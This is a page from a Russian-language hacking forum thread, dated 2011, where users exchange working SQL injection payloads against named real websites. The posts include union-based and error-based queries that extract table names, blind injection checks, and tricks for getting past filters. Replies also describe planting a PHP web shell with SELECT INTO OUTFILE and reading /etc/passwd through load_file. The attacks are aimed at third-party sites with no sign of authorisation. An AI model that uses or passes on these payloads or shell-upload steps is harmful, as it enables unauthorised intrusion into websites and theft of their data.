HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18381  
Старый 25.10.2011, 23:45
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?
на самом то деле причина просто в

Цитата:
Сообщение от None  
http://english.in.ua/study.php
?id=7+or+1+group+by+concat((select+table_name+from +information_schema.tables
limit 0,1
),floor%28rand(0)*2))having+min(0)+or+1--+
Цитата:
Сообщение от vaddd  
vaddd said:
site/news.php?id=18 and 1=1 (true)
site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)
site/news.php?id=18 and 1=3 (false)
site/news.php?id=18 and 'a'='a'
в чем суть ошибки? mq вроде бы off
д а какая разница то? Юзай hex формат. А вообще можешь кинуть линк в пм, если просто интересно.

To, M1lten

Может банально идёт сверка $_REQUSET['login'] == $sql_resp['login']

$_REQUSET['login'] = sdf' sqlinj, а $sql_resp['login'] = выводимое тобою значение. Залогиниться возможно, когда идёт проверка на кол-во строк, которое вернулось после ввода. Может вообще два запроса на проверку логина и пароля, д дофига чего может быть и скуль не провести. Если ошибка от мускуля, то юзай error-based sqlinj
 
Ответить с цитированием

  #18382  
Старый 26.10.2011, 13:57
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от =Zeus=  
=Zeus= said:
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:
PHP код:
PHP:
[
COLOR="#000000"]SELECT '[COLOR="#0000BB"][/COLOR]' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;[/COLOR
1.from mysql.userидёт до into dumpfile. Далее может идти только комментарий.

Либо ищем раскрытие путей на сайте, либо читаем через load_file каталоги и ищем полный путь к сайту, хотя возможно прав на папки не бует.

В этом случае Можно будет попробовать посмотреть директории, которые могут быть выведены с сервера, но находящийся в этом каталоге и доп. Файлы, которые можно прочитать или создать нужный файл

Цитата:
Сообщение от crackforme  
crackforme said:
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает
А разве это нужные функции, при раскрутке SQL-inj? Если фильтр идёт на них можно будет обойтись и без их использования.
 
Ответить с цитированием

  #18383  
Старый 26.10.2011, 17:37
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Есть доступ в phpmyadmin

Версия MySQL 5.5.9 как залить шелл?

Какие запросы?
 
Ответить с цитированием

  #18384  
Старый 26.10.2011, 17:46
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от aydin-ka  
aydin-ka said:
Есть доступ в phpmyadmin
Версия MySQL 5.5.9 как залить шелл?
Какие запросы?
select '' into outfile 'абсолютный_путь_до_папки_с_ правами_на_запись/shell.php'
 
Ответить с цитированием

  #18385  
Старый 26.10.2011, 20:55
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Подскажите почему не выводит названия таблиц

http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+informat ion_schema.tables%27
 
Ответить с цитированием

  #18386  
Старый 26.10.2011, 21:02
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Подскажите почему не выводит названия таблиц
http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+informat ion_schema.tables%27
http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+fro m+information_schema.tables--+
 
Ответить с цитированием

  #18387  
Старый 26.10.2011, 21:09
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+fro m+information_schema.tables--+
да и без hex и anhex все норм выводит...

http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,table_name,4,5+from+informatio n_schema.tables--+
 
Ответить с цитированием

  #18388  
Старый 27.10.2011, 00:12
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Народ, а как ваше можно найти полный путь к файлу на хостинге?
 
Ответить с цитированием

  #18389  
Старый 27.10.2011, 00:27
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Народ, а как ваше можно найти полный путь к файлу на хостинге?
/showthread.php?t=30632
 
Ответить с цитированием

  #18390  
Старый 27.10.2011, 14:45
root47
Guest
Сообщений: n/a
Провел на форуме:
4760

Репутация: 0
По умолчанию

http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ